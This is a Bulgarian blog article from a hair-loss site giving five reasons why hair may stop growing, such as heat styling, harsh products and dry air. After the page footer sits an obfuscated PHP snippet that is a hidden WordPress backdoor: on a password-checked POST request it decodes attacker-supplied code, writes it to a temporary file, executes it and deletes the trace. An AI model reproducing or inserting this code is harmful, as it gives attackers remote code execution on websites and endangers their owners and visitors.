Защо косата не расте – възможни причини | Косопад

Защо косата не расте – възможни причини

Три месеца и косата ви изобщо не е пораснала? Не изпадайте в паника, а се информирайте на какво може да дължи и какви са причините:

kosopad-stres

1. Третирането на косата с различни козметични продукти и уреди, за да се сдобием с мечтаната прическа, често се отразяват негативно на състоянието й. Те увреждат кутикулата на косъма и могат да нарушат структурата му, като така косата изтощена. Когато кутикулата на косъма е увредена, поради липсата на жизненост и витамини спира да расте.

2. Дори да не ви се вярва, климатичните промени се отразяват негативно на косата, но не колкото третирането с продукти. Не се учудвайте ако например, от началото на зимата, косата ви не е пораснала: загубила е протеини и е дехидратирана.

kosa-proceduri

3. Топлината, независимо от слънцето, от пресата или от сешоара, е сред големите врагове на косата. Подлагането на косата на високи температури без защита може да е една от главните причини, за да не расте. Ако често подлагате косата си такива процедури, космите се променят и започват да се разрушават. Кутикулата е унищожена. Нямате друг избор, освен да се подстрижете. Увреждането от тези уреди може да е дългосрочно.

4. Влажността също може да е причина, за да не расте косата. Когато няма никаква влажност, косата губи много протеини. Това обаче може да стане и от много агресивен шампоан. Липсата на влага прави косата суха, без блясък, чуплива и пр.

5. Вие самите може да пречите на растежа на косата: ако много скубете косата при ресане, постоянно я стягате и опъвате в различни прически, увреждате структурата на косата.

28. август 2014 18:54:19 от Надя Колева
Категории: Косопад – Статии | Етикети: , , , | Напишете Коментар

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}